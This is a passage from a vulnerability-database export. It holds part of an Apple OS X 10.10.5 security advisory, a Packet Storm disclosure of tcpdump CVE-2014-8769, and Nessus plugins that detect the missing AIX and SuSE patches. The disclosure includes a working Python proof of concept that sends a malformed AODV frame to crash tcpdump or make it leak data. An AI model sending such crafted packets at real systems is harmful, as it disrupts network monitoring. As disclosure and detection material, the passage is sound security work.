These were addressed by updating OpenSSL to version\r\n0.9.8zg.\r\nCVE-ID\r\nCVE-2015-1788\r\nCVE-2015-1789\r\nCVE-2015-1790\r\nCVE-2015-1791\r\nCVE-2015-1792\r\n\r\nperl\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted regular expression may lead to\r\ndisclosure of unexpected application termination or arbitrary code\r\nexecution\r\nDescription: An integer underflow issue existed in the way Perl\r\nparsed regular expressions. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2013-7422\r\n\r\nPostgreSQL\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: An attacker may be able to cause unexpected application\r\ntermination or gain access to data without proper authentication\r\nDescription: Multiple issues existed in PostgreSQL 9.2.4. These\r\nissues were addressed by updating PostgreSQL to 9.2.13.\r\nCVE-ID\r\nCVE-2014-0067\r\nCVE-2014-8161\r\nCVE-2015-0241\r\nCVE-2015-0242\r\nCVE-2015-0243\r\nCVE-2015-0244\r\n\r\npython\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in Python 2.7.6, the most\r\nserious of which may lead to arbitrary code execution\r\nDescription: Multiple vulnerabilities existed in Python versions\r\nprior to 2.7.6. These were addressed by updating Python to version\r\n2.7.10.\r\nCVE-ID\r\nCVE-2013-7040\r\nCVE-2013-7338\r\nCVE-2014-1912\r\nCVE-2014-7185\r\nCVE-2014-9365\r\n\r\nQL Office\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted Office document may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in parsing of Office\r\ndocuments. 
This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5773 : Apple\r\n\r\nQL Office\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted XML file may lead to\r\ndisclosure of user information\r\nDescription: An external entity reference issue existed in XML file\r\nparsing. This issue was addressed through improved parsing.\r\nCVE-ID\r\nCVE-2015-3784 : Bruno Morisson of INTEGRITY S.A.\r\n\r\nQuartz Composer Framework\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted QuickTime file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in parsing of\r\nQuickTime files. This issue was addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-5771 : Apple\r\n\r\nQuick Look\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Searching for a previously viewed website may launch the web\r\nbrowser and render that website\r\nDescription: An issue existed where QuickLook had the capability to\r\nexecute JavaScript. 
The issue was addressed by disallowing execution\r\nof JavaScript.\r\nCVE-ID\r\nCVE-2015-3781 : Andrew Pouliot of Facebook, Anto Loyola of Qubole\r\n\r\nQuickTime 7\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in QuickTime.\r\nThese issues were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3772\r\nCVE-2015-3779\r\nCVE-2015-5753 : Apple\r\nCVE-2015-5779 : Apple\r\n\r\nQuickTime 7\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in QuickTime.\r\nThese issues were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3765 : Joe Burnett of Audio Poison\r\nCVE-2015-3788 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3789 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3790 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3791 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3792 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-5751 : WalkerFuz\r\n\r\nSceneKit\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Viewing a maliciously crafted Collada file may lead to\r\narbitrary code execution\r\nDescription: A heap buffer overflow existed in SceneKit's handling\r\nof Collada files. 
This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5772 : Apple\r\n\r\nSceneKit\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in SceneKit. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3783 : Haris Andrianakis of Google Security Team\r\n\r\nSecurity\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A standard user may be able to gain access to admin\r\nprivileges without proper authentication\r\nDescription: An issue existed in handling of user authentication.\r\nThis issue was addressed through improved authentication checks.\r\nCVE-ID\r\nCVE-2015-3775 : [Eldon Ahrold]\r\n\r\nSMBClient\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the SMB client.\r\nThis issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3773 : Ilja van Sprundel\r\n\r\nSpeech UI\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted unicode string with speech\r\nalerts enabled may lead to an unexpected application termination or\r\narbitrary code execution\r\nDescription: A memory corruption issue existed in handling of\r\nUnicode strings. This issue was addressed by improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-3794 : Adam Greenbaum of Refinitive\r\n\r\nsudo\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in sudo versions prior to\r\n1.7.10p9, the most serious of which may allow an attacker access to\r\narbitrary files\r\nDescription: Multiple vulnerabilities existed in sudo versions prior\r\nto 1.7.10p9. 
These were addressed by updating sudo to version\r\n1.7.10p9.\r\nCVE-ID\r\nCVE-2013-1775\r\nCVE-2013-1776\r\nCVE-2013-2776\r\nCVE-2013-2777\r\nCVE-2014-0106\r\nCVE-2014-9680\r\n\r\ntcpdump\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in tcpdump 4.7.3, the most\r\nserious of which may allow a remote attacker to cause a denial of\r\nservice.\r\nDescription: Multiple vulnerabilities existed in tcpdump versions\r\nprior to 4.7.3. These were addressed by updating tcpdump to version\r\n4.7.3.\r\nCVE-ID\r\nCVE-2014-8767\r\nCVE-2014-8769\r\nCVE-2014-9140\r\n\r\nText Formats\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted text file may lead to\r\ndisclosure of user information\r\nDescription: An XML external entity reference issue existed with\r\nTextEdit parsing. This issue was addressed through improved parsing.\r\nCVE-ID\r\nCVE-2015-3762 : Xiaoyong Wu of the Evernote Security Team\r\n\r\nudf\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted DMG file may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in parsing of\r\nmalformed DMG images. 
This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3767 : beist of grayhash\r\n\r\nOS X Yosemite v10.10.5 includes the security content of Safari 8.0.8:\r\nhttps://support.apple.com/en-us/HT205033\r\n\r\nOS X Yosemite 10.10.5 and Security Update 2015-006 may be obtained\r\nfrom the Mac App Store or Apple's Software Downloads web site:\r\nhttp://www.apple.com/support/downloads/\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: https://support.apple.com/kb/HT201222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n\r\n\r\n", "modified": "2015-08-17T00:00:00", "published": "2015-08-17T00:00:00", "id": "SECURITYVULNS:DOC:32390", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32390", "title": "APPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update 2015-006", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:16:31", "bulletinFamily": "exploit", "description": "", "modified": "2014-11-19T00:00:00", "published": "2014-11-19T00:00:00", "href": "https://packetstormsecurity.com/files/129157/tcpdump-4.6.2-AOVD-Unreliable-Output.html", "id": "PACKETSTORM:129157", "type": "packetstorm", "title": "tcpdump 4.6.2 AOVD Unreliable Output", "sourceData": "`CVE-2014-8769 tcpdump unreliable output using malformed AOVD payload \n \n1. Background \n \ntcpdump is a powerful command-line packet analyzer. It allows the user \nto intercept and display TCP/IP and other packets being transmitted or \nreceived over a network to which the computer is attached. \n \n2. Summary Information \n \nIt was found out that malformed network traffic (AOVD-based) can lead to \nan abnormal behaviour if verbose output of tcpdump monitoring the \nnetwork is used. \n \n3. 
Technical Description \n \nThe application decoder for the Ad hoc On-Demand Distance Vector (AODV) \nprotocol fails to perform input validation and performs unsafe \nout-of-bound accesses. The application will usually not crash, but \nperform out-of-bounds accesses and output/leak larger amounts of invalid \ndata, which might lead to dropped packets. It is unknown if other \npayload exists that might trigger segfaults. \n \nTo reproduce start tcpdump on a network interface \n \nsudo tcpdump -i lo -s 0 -n -v \n \n(running the program with sudo might hide a possible segfault message on \ncertain environments, see dmesg for details) \n \nand use the following python program to generate a frame on the network \n(might also need sudo): \n \n#!/usr/bin/env python \nfrom socket import socket, AF_PACKET, SOCK_RAW \ns = socket(AF_PACKET, SOCK_RAW) \ns.bind((\"lo\", 0)) \n \naovd_frame = \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x8c\\x7a\\xdf\\x6f\\x08\\x00\\x45\\x00\\xe6\\x3d\\xf3\\x7f\\x40\\x00\\x40\\x11\\x30\\xc6\\x0a\\x01\\x01\\x68\\x0a\\x02\\x02\\x02\\x02\\x8e\\x0d\\x00\\x4b\\x00\\x00\\xe8\\x12\\x00\\x00\\x00\\x00\\x1f\\xc6\\x51\\x35\\x97\\x00\\x24\\x8c\\x7a\\xdf\\x6f\\x08\\x00\\x45\\x00\\xe6\\x3d\\xf3\\x7f\\x40\\x00\\x40\\x11\\x30\\xc6\\x0a\\x01\\x01\" \n \ns.send(aovd_frame) \n \n4. Affected versions \n \nAffected versions are 3.8 through 4.6.2 \n \n5. Fix \n \nThe problem is fixed in the upcoming version tcpdump 4.7.0 \n \n6. Advisory Timeline \n \n2014-11-08 Discovered \n2014-11-09 Requested CVE \n2014-11-11 Reported vendor by email \n2014-11-12 Vendor made a fix available as repository patch \n2014-11-13 CVE number received \n2014-11-13 Published CVE advisory \n \n7. Credit \n \nThe issue was found by \n \nSteffen Bauch \nTwitter: @steffenbauch \nhttp://steffenbauch.de \n \nusing a slightly enhanced version of american fuzzy lop \n(https://code.google.com/p/american-fuzzy-lop/) created by Michal Zalewski. 
\n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/129157/tcpdump-output.txt", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:23:41", "bulletinFamily": "scanner", "description": "CVE-2014-8769 tcpdump is vulnerable to a denial of service, caused by the improper handling of input by the application decoder for the Ad hoc On-Demand Distance Vector (AODV) protocol. By sending specially-crafted data, a remote attacker could exploit this vulnerability to cause the application to crash.\n\nPlease see following for more information :\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769", "modified": "2015-03-19T00:00:00", "id": "AIX_IV68951.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81922", "published": "2015-03-19T00:00:00", "title": "AIX 7.1 TL 2 : tcpdump (IV68951)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory tcpdump_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81922);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2015/03/19 15:24:54 $\");\n\n script_cve_id(\"CVE-2014-8769\");\n\n script_name(english:\"AIX 7.1 TL 2 : tcpdump (IV68951)\");\n script_summary(english:\"Check for APAR IV68951\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2014-8769 tcpdump is vulnerable to a denial of service, caused by\nthe improper handling of input by the application decoder for the Ad\nhoc On-Demand Distance Vector (AODV) protocol. 
By sending\nspecially-crafted data, a remote attacker could exploit this\nvulnerability to cause the application to crash.\n\nPlease see following for more information :\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/tcpdump_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:7.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! 
get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"7.1\", ml:\"02\", sp:\"05\", patch:\"IV68951s5a\", package:\"bos.net.tcp.server\", minfilesetver:\"7.1.2.0\", maxfilesetver:\"7.1.2.18\") < 0) flag++;\nif (aix_check_ifix(release:\"7.1\", ml:\"02\", sp:\"06\", patch:\"IV68951s5a\", package:\"bos.net.tcp.server\", minfilesetver:\"7.1.2.0\", maxfilesetver:\"7.1.2.18\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:23:41", "bulletinFamily": "scanner", "description": "CVE-2014-8769 tcpdump is vulnerable to a denial of service, caused by the improper handling of input by the application decoder for the Ad hoc On-Demand Distance Vector (AODV) protocol. 
By sending specially-crafted data, a remote attacker could exploit this vulnerability to cause the application to crash.\n\nPlease see following for more information :\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769", "modified": "2015-03-19T00:00:00", "id": "AIX_IV68992.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81923", "published": "2015-03-19T00:00:00", "title": "AIX 6.1 TL 9 : tcpdump (IV68992)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory tcpdump_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81923);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2015/03/19 15:24:54 $\");\n\n script_cve_id(\"CVE-2014-8769\");\n\n script_name(english:\"AIX 6.1 TL 9 : tcpdump (IV68992)\");\n script_summary(english:\"Check for APAR IV68992\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2014-8769 tcpdump is vulnerable to a denial of service, caused by\nthe improper handling of input by the application decoder for the Ad\nhoc On-Demand Distance Vector (AODV) protocol. 
By sending\nspecially-crafted data, a remote attacker could exploit this\nvulnerability to cause the application to crash.\n\nPlease see following for more information :\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/tcpdump_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! 
get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"09\", sp:\"04\", patch:\"IV68992s4a\", package:\"bos.net.tcp.server\", minfilesetver:\"6.1.9.0\", maxfilesetver:\"6.1.9.30\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:23:41", "bulletinFamily": "scanner", "description": "CVE-2014-8769 tcpdump is vulnerable to a denial of service, caused by the improper handling of input by the application decoder for the Ad hoc On-Demand Distance Vector (AODV) protocol. By sending specially-crafted data, a remote attacker could exploit this vulnerability to cause the application to crash.\n\nPlease see following for more information :\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769", "modified": "2015-03-19T00:00:00", "id": "AIX_IV68950.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81921", "published": "2015-03-19T00:00:00", "title": "AIX 6.1 TL 8 : tcpdump (IV68950)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory tcpdump_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81921);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2015/03/19 15:24:54 $\");\n\n script_cve_id(\"CVE-2014-8769\");\n\n script_name(english:\"AIX 6.1 TL 8 : tcpdump (IV68950)\");\n script_summary(english:\"Check for APAR IV68950\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security 
patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2014-8769 tcpdump is vulnerable to a denial of service, caused by\nthe improper handling of input by the application decoder for the Ad\nhoc On-Demand Distance Vector (AODV) protocol. By sending\nspecially-crafted data, a remote attacker could exploit this\nvulnerability to cause the application to crash.\n\nPlease see following for more information :\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/tcpdump_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! 
get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"08\", sp:\"05\", patch:\"IV68950s5a\", package:\"bos.net.tcp.server\", minfilesetver:\"6.1.8.0\", maxfilesetver:\"6.1.8.18\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"08\", sp:\"06\", patch:\"IV68950s5a\", package:\"bos.net.tcp.server\", minfilesetver:\"6.1.8.0\", maxfilesetver:\"6.1.8.18\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:23:41", "bulletinFamily": "scanner", "description": "CVE-2014-8769 tcpdump is vulnerable to a denial of service, caused by the improper handling of input by the application decoder for the Ad hoc On-Demand Distance Vector (AODV) protocol. 
By sending specially-crafted data, a remote attacker could exploit this vulnerability to cause the application to crash.\n\nPlease see following for more information :\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769", "modified": "2015-03-19T00:00:00", "id": "AIX_IV67588.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81920", "published": "2015-03-19T00:00:00", "title": "AIX 7.1 TL 3 : tcpdump (IV67588)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory tcpdump_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81920);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2015/03/19 15:24:54 $\");\n\n script_cve_id(\"CVE-2014-8769\");\n\n script_name(english:\"AIX 7.1 TL 3 : tcpdump (IV67588)\");\n script_summary(english:\"Check for APAR IV67588\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2014-8769 tcpdump is vulnerable to a denial of service, caused by\nthe improper handling of input by the application decoder for the Ad\nhoc On-Demand Distance Vector (AODV) protocol. 
By sending\nspecially-crafted data, a remote attacker could exploit this\nvulnerability to cause the application to crash.\n\nPlease see following for more information :\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/tcpdump_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:7.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! 
get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"7.1\", ml:\"03\", sp:\"04\", patch:\"IV67588s4a\", package:\"bos.net.tcp.server\", minfilesetver:\"7.1.3.0\", maxfilesetver:\"7.1.3.30\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:23:08", "bulletinFamily": "scanner", "description": "tcpdump has been updated to fix two security issues :\n\n - Unreliable output using malformed AOVD payload.\n (CVE-2014-8769). (bnc#905872)\n\n - Denial of service in verbose mode using malformed OLSR payload. (CVE-2014-8767). (bnc#905870)", "modified": "2014-12-26T00:00:00", "id": "SUSE_11_TCPDUMP-141215.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=80253", "published": "2014-12-26T00:00:00", "title": "SuSE 11.3 Security Update : tcpdump (SAT Patch Number 10093)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. 
